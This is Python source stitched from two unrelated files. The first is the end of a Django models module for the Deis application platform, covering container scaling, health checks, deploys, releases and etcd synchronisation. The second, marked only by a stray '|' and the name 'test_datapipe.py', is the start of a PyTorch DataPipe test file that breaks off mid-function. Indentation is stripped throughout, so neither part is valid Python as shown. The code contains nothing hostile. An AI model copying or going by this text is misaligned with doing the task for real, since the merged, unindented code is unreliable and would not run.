if changed:
if "scale" in dir(self._scheduler):
self._scale_containers(scale_types, to_remove)
else:
if to_add:
self._start_containers(to_add)
if to_remove:
self._destroy_containers(to_remove)
# save new structure to the database
vals = self.container_set.exclude(type='run').values(
'type').annotate(Count('pk')).order_by()
new_structure = structure.copy()
new_structure.update({v['type']: v['pk__count'] for v in vals})
self.structure = new_structure
self.save()
return changed
def _scale_containers(self, scale_types, to_remove):
release = self.release_set.latest()
for scale_type in scale_types:
image = release.image
version = "v{}".format(release.version)
kwargs = {'memory': release.config.memory,
'cpu': release.config.cpu,
'tags': release.config.tags,
'version': version,
'aname': self.id,
'num': scale_types[scale_type]}
job_id = self._get_job_id(scale_type)
command = self._get_command(scale_type)
try:
self._scheduler.scale(
name=job_id,
image=image,
command=command,
**kwargs)
except Exception as e:
err = '{} (scale): {}'.format(job_id, e)
log_event(self, err, logging.ERROR)
raise
[c.delete() for c in to_remove]
def _start_containers(self, to_add):
"""Creates and starts containers via the scheduler"""
if not to_add:
return
create_threads = [Thread(target=c.create) for c in to_add]
start_threads = [Thread(target=c.start) for c in to_add]
[t.start() for t in create_threads]
[t.join() for t in create_threads]
if any(c.state != 'created' for c in to_add):
err = 'aborting, failed to create some containers'
log_event(self, err, logging.ERROR)
self._destroy_containers(to_add)
raise RuntimeError(err)
[t.start() for t in start_threads]
[t.join() for t in start_threads]
if set([c.state for c in to_add]) != set(['up']):
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
# if the user specified a health check, try checking to see if it's running
try:
config = self.config_set.latest()
if 'HEALTHCHECK_URL' in config.values.keys():
self._healthcheck(to_add, config.values)
except Config.DoesNotExist:
pass
def _healthcheck(self, containers, config):
# if at first it fails, back off and try again at 10%, 50% and 100% of INITIAL_DELAY
intervals = [1.0, 0.1, 0.5, 1.0]
# HACK (bacongobbler): we need to wait until publisher has a chance to publish each
# service to etcd, which can take up to 20 seconds.
time.sleep(20)
for i in xrange(len(intervals)):
delay = int(config.get('HEALTHCHECK_INITIAL_DELAY', 0))
try:
# sleep until the initial timeout is over
if delay > 0:
time.sleep(delay * intervals[i])
to_healthcheck = [c for c in containers if c.type in ['web', 'cmd']]
self._do_healthcheck(to_healthcheck, config)
break
except exceptions.HealthcheckException as e:
try:
next_delay = delay * intervals[i+1]
msg = "{}; trying again in {} seconds".format(e, next_delay)
log_event(self, msg, logging.WARNING)
except IndexError:
log_event(self, e, logging.WARNING)
else:
self._destroy_containers(containers)
msg = "aborting, app containers failed to respond to health check"
log_event(self, msg, logging.ERROR)
raise RuntimeError(msg)
def _do_healthcheck(self, containers, config):
path = config.get('HEALTHCHECK_URL', '/')
timeout = int(config.get('HEALTHCHECK_TIMEOUT', 1))
if not _etcd_client:
raise exceptions.HealthcheckException('no etcd client available')
for container in containers:
try:
key = "/deis/services/{self}/{container.job_id}".format(**locals())
url = "http://{}{}".format(_etcd_client.get(key).value, path)
response = requests.get(url, timeout=timeout)
if response.status_code != requests.codes.OK:
raise exceptions.HealthcheckException(
"app failed health check (got '{}', expected: '200')".format(
response.status_code))
except (requests.Timeout, requests.ConnectionError, KeyError) as e:
raise exceptions.HealthcheckException(
'failed to connect to container ({})'.format(e))
def _restart_containers(self, to_restart):
"""Restarts containers via the scheduler"""
if not to_restart:
return
stop_threads = [Thread(target=c.stop) for c in to_restart]
start_threads = [Thread(target=c.start) for c in to_restart]
[t.start() for t in stop_threads]
[t.join() for t in stop_threads]
if any(c.state != 'created' for c in to_restart):
err = 'warning, some containers failed to stop'
log_event(self, err, logging.WARNING)
[t.start() for t in start_threads]
[t.join() for t in start_threads]
if any(c.state != 'up' for c in to_restart):
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
def _destroy_containers(self, to_destroy):
"""Destroys containers via the scheduler"""
if not to_destroy:
return
destroy_threads = [Thread(target=c.destroy) for c in to_destroy]
[t.start() for t in destroy_threads]
[t.join() for t in destroy_threads]
[c.delete() for c in to_destroy if c.state == 'destroyed']
if any(c.state != 'destroyed' for c in to_destroy):
err = 'aborting, failed to destroy some containers'
log_event(self, err, logging.ERROR)
raise RuntimeError(err)
def deploy(self, user, release):
"""Deploy a new release to this application"""
existing = self.container_set.exclude(type='run')
new = []
scale_types = set()
for e in existing:
n = e.clone(release)
n.save()
new.append(n)
scale_types.add(e.type)
if new and "deploy" in dir(self._scheduler):
self._deploy_app(scale_types, release, existing)
else:
self._start_containers(new)
# destroy old containers
if existing:
self._destroy_containers(existing)
# perform default scaling if necessary
if self.structure == {} and release.build is not None:
self._default_scale(user, release)
def _deploy_app(self, scale_types, release, existing):
for scale_type in scale_types:
image = release.image
version = "v{}".format(release.version)
kwargs = {'memory': release.config.memory,
'cpu': release.config.cpu,
'tags': release.config.tags,
'aname': self.id,
'num': 0,
'version': version}
job_id = self._get_job_id(scale_type)
command = self._get_command(scale_type)
try:
self._scheduler.deploy(
name=job_id,
image=image,
command=command,
**kwargs)
except Exception as e:
err = '{} (deploy): {}'.format(job_id, e)
log_event(self, err, logging.ERROR)
raise
[c.delete() for c in existing]
def _default_scale(self, user, release):
"""Scale to default structure based on release type"""
# if there is no SHA, assume a docker image is being promoted
if not release.build.sha:
structure = {'cmd': 1}
# if a dockerfile exists without a procfile, assume docker workflow
elif release.build.dockerfile and not release.build.procfile:
structure = {'cmd': 1}
# if a procfile exists without a web entry, assume docker workflow
elif release.build.procfile and 'web' not in release.build.procfile:
structure = {'cmd': 1}
# default to heroku workflow
else:
structure = {'web': 1}
self.scale(user, structure)
def logs(self, log_lines=str(settings.LOG_LINES)):
"""Return aggregated log data for this application."""
try:
url = "http://{}:{}/{}?log_lines={}".format(settings.LOGGER_HOST, settings.LOGGER_PORT,
self.id, log_lines)
r = requests.get(url)
# Handle HTTP request errors
except requests.exceptions.RequestException as e:
logger.error("Error accessing deis-logger using url '{}': {}".format(url, e))
raise e
# Handle logs empty or not found
if r.status_code == 204 or r.status_code == 404:
logger.info("GET {} returned a {} status code".format(url, r.status_code))
raise EnvironmentError('Could not locate logs')
# Handle unanticipated status codes
if r.status_code != 200:
logger.error("Error accessing deis-logger: GET {} returned a {} status code"
.format(url, r.status_code))
raise EnvironmentError('Error accessing deis-logger')
return r.content
def run(self, user, command):
"""Run a one-off command in an ephemeral app container."""
# FIXME: remove the need for SSH private keys by using
# a scheduler that supports one-off admin tasks natively
if not settings.SSH_PRIVATE_KEY:
raise EnvironmentError('Support for admin commands is not configured')
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release to run this command')
# TODO: add support for interactive shell
msg = "{} runs '{}'".format(user.username, command)
log_event(self, msg)
c_num = max([c.num for c in self.container_set.filter(type='run')] or [0]) + 1
# create database record for run process
c = Container.objects.create(owner=self.owner,
app=self,
release=self.release_set.latest(),
type='run',
num=c_num)
image = c.release.image
# check for backwards compatibility
def _has_hostname(image):
repo, tag = dockerutils.parse_repository_tag(image)
return True if '/' in repo and '.' in repo.split('/')[0] else False
if not _has_hostname(image):
image = '{}:{}/{}'.format(settings.REGISTRY_HOST,
settings.REGISTRY_PORT,
image)
# SECURITY: shell-escape user input
escaped_command = command.replace("'", "'\\''")
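        # e.g. echo 'hi'  ->  echo '\''hi'\'' , so the command can later be wrapped
        # in single quotes by Container.run() without breaking out of the quoting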
return c.run(escaped_command)
@python_2_unicode_compatible
class Container(UuidAuditedModel):
"""
Docker container used to securely host an application process.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
release = models.ForeignKey('Release')
type = models.CharField(max_length=128, blank=False)
num = models.PositiveIntegerField()
@property
def _scheduler(self):
return self.app._scheduler
@property
def state(self):
return self._scheduler.state(self.job_id).name
def short_name(self):
return "{}.{}.{}".format(self.app.id, self.type, self.num)
short_name.short_description = 'Name'
def __str__(self):
return self.short_name()
class Meta:
get_latest_by = '-created'
ordering = ['created']
@property
def job_id(self):
version = "v{}".format(self.release.version)
return "{self.app.id}_{version}.{self.type}.{self.num}".format(**locals())
def _get_command(self):
try:
            # if this is not a procfile-based app, ensure they cannot break out
# and run arbitrary commands on the host
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.dockerfile or not self.release.build.sha:
return "bash -c '{}'".format(self.release.build.procfile[self.type])
else:
return 'start {}'.format(self.type)
# if the key is not present or if a parent attribute is None
except (KeyError, TypeError, AttributeError):
# handle special case for Dockerfile deployments
return '' if self.type == 'cmd' else 'start {}'.format(self.type)
_command = property(_get_command)
def clone(self, release):
c = Container.objects.create(owner=self.owner,
app=self.app,
release=release,
type=self.type,
num=self.num)
return c
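    # The lifecycle methods below (create/start/stop/destroy) all follow the same
    # pattern: run under @close_db_connections (presumably to avoid holding stale
    # database connections across scheduler calls), delegate to the scheduler by
    # job_id, and log-and-reraise any scheduler error against the parent app.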
@close_db_connections
def create(self):
image = self.release.image
kwargs = {'memory': self.release.config.memory,
'cpu': self.release.config.cpu,
'tags': self.release.config.tags}
try:
self._scheduler.create(
name=self.job_id,
image=image,
command=self._command,
**kwargs)
except Exception as e:
err = '{} (create): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@close_db_connections
def start(self):
try:
self._scheduler.start(self.job_id)
except Exception as e:
err = '{} (start): {}'.format(self.job_id, e)
log_event(self.app, err, logging.WARNING)
raise
@close_db_connections
def stop(self):
try:
self._scheduler.stop(self.job_id)
except Exception as e:
err = '{} (stop): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@close_db_connections
def destroy(self):
try:
self._scheduler.destroy(self.job_id)
except Exception as e:
err = '{} (destroy): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
def run(self, command):
"""Run a one-off command"""
if self.release.build is None:
raise EnvironmentError('No build associated with this release '
'to run this command')
image = self.release.image
entrypoint = '/bin/bash'
# if this is a procfile-based app, switch the entrypoint to slugrunner's default
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.procfile and \
self.release.build.sha and not \
self.release.build.dockerfile:
entrypoint = '/runner/init'
command = "'{}'".format(command)
else:
command = "-c '{}'".format(command)
try:
rc, output = self._scheduler.run(self.job_id, image, entrypoint, command)
return rc, output
except Exception as e:
err = '{} (run): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@python_2_unicode_compatible
class Push(UuidAuditedModel):
"""
Instance of a push used to trigger an application build
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
sha = models.CharField(max_length=40)
fingerprint = models.CharField(max_length=255)
receive_user = models.CharField(max_length=255)
receive_repo = models.CharField(max_length=255)
ssh_connection = models.CharField(max_length=255)
ssh_original_command = models.CharField(max_length=255)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{0}-{1}".format(self.app.id, self.sha[:7])
@python_2_unicode_compatible
class Build(UuidAuditedModel):
"""
Instance of a software build used by runtime nodes
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
image = models.CharField(max_length=256)
# optional fields populated by builder
sha = models.CharField(max_length=40, blank=True)
procfile = JSONField(default={}, blank=True)
dockerfile = models.TextField(blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def create(self, user, *args, **kwargs):
latest_release = self.app.release_set.latest()
source_version = 'latest'
if self.sha:
source_version = 'git-{}'.format(self.sha)
new_release = latest_release.new(user,
build=self,
config=latest_release.config,
source_version=source_version)
try:
self.app.deploy(user, new_release)
return new_release
except RuntimeError:
new_release.delete()
raise
def save(self, **kwargs):
try:
previous_build = self.app.build_set.latest()
to_destroy = []
for proctype in previous_build.procfile:
if proctype not in self.procfile:
for c in self.app.container_set.filter(type=proctype):
to_destroy.append(c)
self.app._destroy_containers(to_destroy)
except Build.DoesNotExist:
pass
return super(Build, self).save(**kwargs)
def __str__(self):
return "{0}-{1}".format(self.app.id, self.uuid[:7])
@python_2_unicode_compatible
class Config(UuidAuditedModel):
"""
Set of configuration values applied as environment variables
during runtime execution of the Application.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
values = JSONField(default={}, blank=True)
memory = JSONField(default={}, blank=True)
cpu = JSONField(default={}, blank=True)
tags = JSONField(default={}, blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{}-{}".format(self.app.id, self.uuid[:7])
def save(self, **kwargs):
"""merge the old config with the new"""
try:
previous_config = self.app.config_set.latest()
for attr in ['cpu', 'memory', 'tags', 'values']:
# Guard against migrations from older apps without fixes to
# JSONField encoding.
try:
data = getattr(previous_config, attr).copy()
except AttributeError:
data = {}
try:
new_data = getattr(self, attr).copy()
except AttributeError:
new_data = {}
data.update(new_data)
# remove config keys if we provided a null value
[data.pop(k) for k, v in new_data.viewitems() if v is None]
setattr(self, attr, data)
except Config.DoesNotExist:
pass
return super(Config, self).save(**kwargs)
@python_2_unicode_compatible
class Release(UuidAuditedModel):
"""
Software release deployed by the application platform
Releases contain a :class:`Build` and a :class:`Config`.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
version = models.PositiveIntegerField()
summary = models.TextField(blank=True, null=True)
config = models.ForeignKey('Config')
build = models.ForeignKey('Build', null=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'version'),)
def __str__(self):
return "{0}-v{1}".format(self.app.id, self.version)
@property
def image(self):
return '{}:v{}'.format(self.app.id, str(self.version))
def new(self, user, config, build, summary=None, source_version='latest'):
"""
Create a new application release using the provided Build and Config
on behalf of a user.
Releases start at v1 and auto-increment.
"""
# construct fully-qualified target image
new_version = self.version + 1
# create new release and auto-increment version
release = Release.objects.create(
owner=user, app=self.app, config=config,
build=build, version=new_version, summary=summary)
try:
release.publish()
except EnvironmentError as e:
# If we cannot publish this app, just log and carry on
log_event(self.app, e)
pass
return release
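    # publish() tags the source image with the git SHA (or the provided source
    # version) when the build image carries no explicit tag, then hands it to
    # publish_release() together with the config values and the target image name
    # (self.image, i.e. '<app>:v<version>'); publish_release() is defined
    # elsewhere and presumably retags and pushes the image under that name.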
def publish(self, source_version='latest'):
if self.build is None:
raise EnvironmentError('No build associated with this release to publish')
source_image = self.build.image
if ':' not in source_image:
source_tag = 'git-{}'.format(self.build.sha) if self.build.sha else source_version
source_image = "{}:{}".format(source_image, source_tag)
# If the build has a SHA, assume it's from deis-builder and in the deis-registry already
deis_registry = bool(self.build.sha)
publish_release(source_image, self.config.values, self.image, deis_registry)
def previous(self):
"""
Return the previous Release to this one.
:return: the previous :class:`Release`, or None
"""
releases = self.app.release_set
if self.pk:
releases = releases.exclude(pk=self.pk)
try:
# Get the Release previous to this one
prev_release = releases.latest()
except Release.DoesNotExist:
prev_release = None
return prev_release
def rollback(self, user, version):
if version < 1:
            raise EnvironmentError('version cannot be below 1')
summary = "{} rolled back to v{}".format(user, version)
prev = self.app.release_set.get(version=version)
new_release = self.new(
user,
build=prev.build,
config=prev.config,
summary=summary,
source_version='v{}'.format(version))
try:
self.app.deploy(user, new_release)
return new_release
except RuntimeError:
new_release.delete()
raise
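    # save() below builds a human-readable summary of what changed between
    # releases, e.g. "alice deployed 1a2b3c4 and alice changed FOO, BAR" when a
    # new build and new config values land in the same release (names and keys
    # here are illustrative).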
def save(self, *args, **kwargs): # noqa
if not self.summary:
self.summary = ''
prev_release = self.previous()
# compare this build to the previous build
old_build = prev_release.build if prev_release else None
old_config = prev_release.config if prev_release else None
# if the build changed, log it and who pushed it
if self.version == 1:
self.summary += "{} created initial release".format(self.app.owner)
elif self.build != old_build:
if self.build.sha:
self.summary += "{} deployed {}".format(self.build.owner, self.build.sha[:7])
else:
self.summary += "{} deployed {}".format(self.build.owner, self.build.image)
# if the config data changed, log the dict diff
if self.config != old_config:
dict1 = self.config.values
dict2 = old_config.values if old_config else {}
diff = dict_diff(dict1, dict2)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
# if the limits changed (memory or cpu), log the dict diff
changes = []
old_mem = old_config.memory if old_config else {}
diff = dict_diff(self.config.memory, old_mem)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('memory')
old_cpu = old_config.cpu if old_config else {}
diff = dict_diff(self.config.cpu, old_cpu)
if diff.get('added') or diff.get('changed') or diff.get('deleted'):
changes.append('cpu')
if changes:
changes = 'changed limits for '+', '.join(changes)
self.summary += "{} {}".format(self.config.owner, changes)
# if the tags changed, log the dict diff
changes = []
old_tags = old_config.tags if old_config else {}
diff = dict_diff(self.config.tags, old_tags)
# try to be as succinct as possible
added = ', '.join(k for k in diff.get('added', {}))
added = 'added tag ' + added if added else ''
changed = ', '.join(k for k in diff.get('changed', {}))
changed = 'changed tag ' + changed if changed else ''
deleted = ', '.join(k for k in diff.get('deleted', {}))
deleted = 'deleted tag ' + deleted if deleted else ''
changes = ', '.join(i for i in (added, changed, deleted) if i)
if changes:
if self.summary:
self.summary += ' and '
self.summary += "{} {}".format(self.config.owner, changes)
if not self.summary:
if self.version == 1:
self.summary = "{} created the initial release".format(self.owner)
else:
self.summary = "{} changed nothing".format(self.owner)
super(Release, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Domain(AuditedModel):
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
domain = models.TextField(blank=False, null=False, unique=True)
def __str__(self):
return self.domain
@python_2_unicode_compatible
class Certificate(AuditedModel):
"""
Public and private key pair used to secure application traffic at the router.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
# there is no upper limit on the size of an x.509 certificate
certificate = models.TextField(validators=[validate_certificate])
key = models.TextField()
# X.509 certificates allow any string of information as the common name.
common_name = models.TextField(unique=True, validators=[validate_common_name])
expires = models.DateTimeField()
def __str__(self):
return self.common_name
def _get_certificate(self):
try:
return crypto.load_certificate(crypto.FILETYPE_PEM, self.certificate)
except crypto.Error as e:
raise SuspiciousOperation(e)
def save(self, *args, **kwargs):
certificate = self._get_certificate()
if not self.common_name:
self.common_name = certificate.get_subject().CN
if not self.expires:
# convert openssl's expiry date format to Django's DateTimeField format
self.expires = datetime.strptime(certificate.get_notAfter(), '%Y%m%d%H%M%SZ')
return super(Certificate, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Key(UuidAuditedModel):
"""An SSH public key."""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.CharField(max_length=128)
public = models.TextField(unique=True, validators=[validate_base64])
fingerprint = models.CharField(max_length=128)
class Meta:
verbose_name = 'SSH Key'
unique_together = (('owner', 'fingerprint'))
def __str__(self):
return "{}...{}".format(self.public[:18], self.public[-31:])
def save(self, *args, **kwargs):
self.fingerprint = fingerprint(self.public)
return super(Key, self).save(*args, **kwargs)
# define update/delete callbacks for synchronizing
# models with the configuration management backend
def _log_build_created(**kwargs):
if kwargs.get('created'):
build = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: build {} created".format(build.app, build))
def _log_release_created(**kwargs):
if kwargs.get('created'):
release = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: release {} created".format(release.app, release))
# append release lifecycle logs to the app
release.app.log(release.summary)
def _log_config_updated(**kwargs):
config = kwargs['instance']
# log only to the controller; this event will be logged in the release summary
logger.info("{}: config {} updated".format(config.app, config))
def _log_domain_added(**kwargs):
if kwargs.get('created'):
domain = kwargs['instance']
msg = "domain {} added".format(domain)
log_event(domain.app, msg)
def _log_domain_removed(**kwargs):
domain = kwargs['instance']
msg = "domain {} removed".format(domain)
log_event(domain.app, msg)
def _log_cert_added(**kwargs):
if kwargs.get('created'):
cert = kwargs['instance']
logger.info("cert {} added".format(cert))
def _log_cert_removed(**kwargs):
cert = kwargs['instance']
logger.info("cert {} removed".format(cert))
def _etcd_publish_key(**kwargs):
key = kwargs['instance']
_etcd_client.write('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)), key.public)
def _etcd_purge_key(**kwargs):
key = kwargs['instance']
try:
_etcd_client.delete('/deis/builder/users/{}/{}'.format(
key.owner.username, fingerprint(key.public)))
except KeyError:
pass
def _etcd_purge_user(**kwargs):
username = kwargs['instance'].username
try:
_etcd_client.delete(
'/deis/builder/users/{}'.format(username), dir=True, recursive=True)
except KeyError:
# If _etcd_publish_key() wasn't called, there is no user dir to delete.
pass
def _etcd_publish_app(**kwargs):
appname = kwargs['instance']
try:
_etcd_client.write('/deis/services/{}'.format(appname), None, dir=True)
except KeyError:
# Ignore error when the directory already exists.
pass
def _etcd_purge_app(**kwargs):
appname = kwargs['instance']
try:
_etcd_client.delete('/deis/services/{}'.format(appname), dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_cert(**kwargs):
cert = kwargs['instance']
_etcd_client.write('/deis/certs/{}/cert'.format(cert), cert.certificate)
_etcd_client.write('/deis/certs/{}/key'.format(cert), cert.key)
def _etcd_purge_cert(**kwargs):
cert = kwargs['instance']
try:
_etcd_client.delete('/deis/certs/{}'.format(cert),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_config(**kwargs):
config = kwargs['instance']
# we purge all existing config when adding the newest instance. This is because
# deis config:unset would remove an existing value, but not delete the
# old config object
try:
_etcd_client.delete('/deis/config/{}'.format(config.app),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
for k, v in config.values.iteritems():
_etcd_client.write(
'/deis/config/{}/{}'.format(
config.app,
unicode(k).encode('utf-8').lower()),
unicode(v).encode('utf-8'))
def _etcd_purge_config(**kwargs):
config = kwargs['instance']
try:
_etcd_client.delete('/deis/config/{}'.format(config.app),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
def _etcd_publish_domains(**kwargs):
domain = kwargs['instance']
_etcd_client.write('/deis/domains/{}'.format(domain), domain.app)
def _etcd_purge_domains(**kwargs):
domain = kwargs['instance']
try:
_etcd_client.delete('/deis/domains/{}'.format(domain),
prevExist=True, dir=True, recursive=True)
except KeyError:
pass
# Log significant app-related events
post_save.connect(_log_build_created, sender=Build, dispatch_uid='api.models.log')
post_save.connect(_log_release_created, sender=Release, dispatch_uid='api.models.log')
post_save.connect(_log_config_updated, sender=Config, dispatch_uid='api.models.log')
post_save.connect(_log_domain_added, sender=Domain, dispatch_uid='api.models.log')
post_save.connect(_log_cert_added, sender=Certificate, dispatch_uid='api.models.log')
post_delete.connect(_log_domain_removed, sender=Domain, dispatch_uid='api.models.log')
post_delete.connect(_log_cert_removed, sender=Certificate, dispatch_uid='api.models.log')
# automatically generate a new token on creation
@receiver(post_save, sender=get_user_model())
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
_etcd_client = get_etcd_client()
if _etcd_client:
post_save.connect(_etcd_publish_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_user, sender=get_user_model(), dispatch_uid='api.models')
post_save.connect(_etcd_publish_domains, sender=Domain, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_domains, sender=Domain, dispatch_uid='api.models')
post_save.connect(_etcd_publish_app, sender=App, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_app, sender=App, dispatch_uid='api.models')
post_save.connect(_etcd_publish_cert, sender=Certificate, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_cert, sender=Certificate, dispatch_uid='api.models')
post_save.connect(_etcd_publish_config, sender=Config, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_config, sender=Config, dispatch_uid='api.models')
|
test_datapipe.py
|
# Owner(s): ["module: dataloader"]
import copy
import http.server
import itertools
import os
import os.path
import pickle
import random
import socketserver
import sys
import tarfile
import tempfile
import threading
import time
import unittest
import warnings
import zipfile
from functools import partial
from typing import (
Any,
Awaitable,
Dict,
Generic,
Iterator,
List,
NamedTuple,
Optional,
Set,
Tuple,
Type,
TypeVar,
Union,
)
from unittest import skipIf
import numpy as np
import torch
import torch.utils.data.backward_compatibility
import torch.utils.data.datapipes as dp
import torch.utils.data.graph
import torch.utils.data.graph_settings
from torch.testing._internal.common_utils import TestCase, run_tests, suppress_warnings
from torch.utils.data import (
DataLoader,
DataChunk,
IterDataPipe,
MapDataPipe,
RandomSampler,
argument_validation,
runtime_validation,
runtime_validation_disabled,
)
from torch.utils.data.graph import traverse
from torch.utils.data.datapipes.utils.decoder import (
basichandlers as decoder_basichandlers,
)
try:
import dill
# XXX: By default, dill writes the Pickler dispatch table to inject its
# own logic there. This globally affects the behavior of the standard library
# pickler for any user who transitively depends on this module!
# Undo this extension to avoid altering the behavior of the pickler globally.
dill.extend(use_dill=False)
HAS_DILL = True
except ImportError:
HAS_DILL = False
skipIfNoDill = skipIf(not HAS_DILL, "no dill")
try:
import pandas # type: ignore[import] # noqa: F401 F403
HAS_PANDAS = True
except ImportError:
HAS_PANDAS = False
skipIfNoDataFrames = skipIf(not HAS_PANDAS, "no dataframes (pandas)")
T_co = TypeVar("T_co", covariant=True)
def create_temp_dir_and_files():
# The temp dir and files within it will be released and deleted in tearDown().
    # Adding `noqa: P201` to avoid the linter's warning on not releasing the dir handle within this function.
temp_dir = tempfile.TemporaryDirectory() # noqa: P201
temp_dir_path = temp_dir.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.txt') as f:
temp_file1_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.byte') as f:
temp_file2_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.empty') as f:
temp_file3_name = f.name
with open(temp_file1_name, 'w') as f1:
f1.write('0123456789abcdef')
with open(temp_file2_name, 'wb') as f2:
f2.write(b"0123456789abcdef")
temp_sub_dir = tempfile.TemporaryDirectory(dir=temp_dir_path) # noqa: P201
temp_sub_dir_path = temp_sub_dir.name
with tempfile.NamedTemporaryFile(dir=temp_sub_dir_path, delete=False, suffix='.txt') as f:
temp_sub_file1_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_sub_dir_path, delete=False, suffix='.byte') as f:
temp_sub_file2_name = f.name
with open(temp_sub_file1_name, 'w') as f1:
f1.write('0123456789abcdef')
with open(temp_sub_file2_name, 'wb') as f2:
f2.write(b"0123456789abcdef")
return [(temp_dir, temp_file1_name, temp_file2_name, temp_file3_name),
(temp_sub_dir, temp_sub_file1_name, temp_sub_file2_name)]
# Given a DataPipe and integer n, iterate the DataPipe for n elements and store the elements into a list
# Then, reset the DataPipe and return a tuple of two lists
# 1. A list of elements yielded before the reset
# 2. A list of all elements of the DataPipe after the reset
def reset_after_n_next_calls(datapipe: Union[IterDataPipe[T_co], MapDataPipe[T_co]],
n: int) -> Tuple[List[T_co], List[T_co]]:
it = iter(datapipe)
res_before_reset = []
for _ in range(n):
res_before_reset.append(next(it))
return res_before_reset, list(datapipe)
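# e.g. reset_after_n_next_calls(dp.iter.IterableWrapper(range(5)), 2) returns
# ([0, 1], [0, 1, 2, 3, 4]): two elements read before the reset, then the full
# sequence from the fresh iteration.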
def odd_or_even(x: int) -> int:
return x % 2
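# odd_or_even is defined at module level (rather than as a lambda) so that
# datapipes built with it remain picklable and traversable; lambdas trigger the
# pickle warning exercised in _test_picklable below.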
class TestDataChunk(TestCase):
def setUp(self):
self.elements = list(range(10))
random.shuffle(self.elements)
self.chunk: DataChunk[int] = DataChunk(self.elements)
def test_getitem(self):
for i in range(10):
self.assertEqual(self.elements[i], self.chunk[i])
def test_iter(self):
for ele, dc in zip(self.elements, iter(self.chunk)):
self.assertEqual(ele, dc)
def test_len(self):
self.assertEqual(len(self.elements), len(self.chunk))
def test_as_string(self):
self.assertEqual(str(self.chunk), str(self.elements))
batch = [self.elements] * 3
chunks: List[DataChunk[int]] = [DataChunk(self.elements)] * 3
self.assertEqual(str(batch), str(chunks))
def test_sort(self):
chunk: DataChunk[int] = DataChunk(self.elements)
chunk.sort()
self.assertTrue(isinstance(chunk, DataChunk))
for i, d in enumerate(chunk):
self.assertEqual(i, d)
def test_reverse(self):
chunk: DataChunk[int] = DataChunk(self.elements)
chunk.reverse()
self.assertTrue(isinstance(chunk, DataChunk))
for i in range(10):
self.assertEqual(chunk[i], self.elements[9 - i])
def test_random_shuffle(self):
elements = list(range(10))
chunk: DataChunk[int] = DataChunk(elements)
rng = random.Random(0)
rng.shuffle(chunk)
rng = random.Random(0)
rng.shuffle(elements)
self.assertEqual(chunk, elements)
class TestIterableDataPipeBasic(TestCase):
def setUp(self):
ret = create_temp_dir_and_files()
self.temp_dir = ret[0][0]
self.temp_files = ret[0][1:]
self.temp_sub_dir = ret[1][0]
self.temp_sub_files = ret[1][1:]
def tearDown(self):
try:
self.temp_sub_dir.cleanup()
self.temp_dir.cleanup()
except Exception as e:
warnings.warn("TestIterableDatasetBasic was not able to cleanup temp dir due to {}".format(str(e)))
def test_listdirfiles_iterable_datapipe(self):
temp_dir = self.temp_dir.name
datapipe = dp.iter.FileLister(temp_dir, '')
count = 0
for pathname in datapipe:
count = count + 1
self.assertTrue(pathname in self.temp_files)
self.assertEqual(count, len(self.temp_files))
count = 0
datapipe = dp.iter.FileLister(temp_dir, '', recursive=True)
for pathname in datapipe:
count = count + 1
self.assertTrue((pathname in self.temp_files) or (pathname in self.temp_sub_files))
self.assertEqual(count, len(self.temp_files) + len(self.temp_sub_files))
def test_loadfilesfromdisk_iterable_datapipe(self):
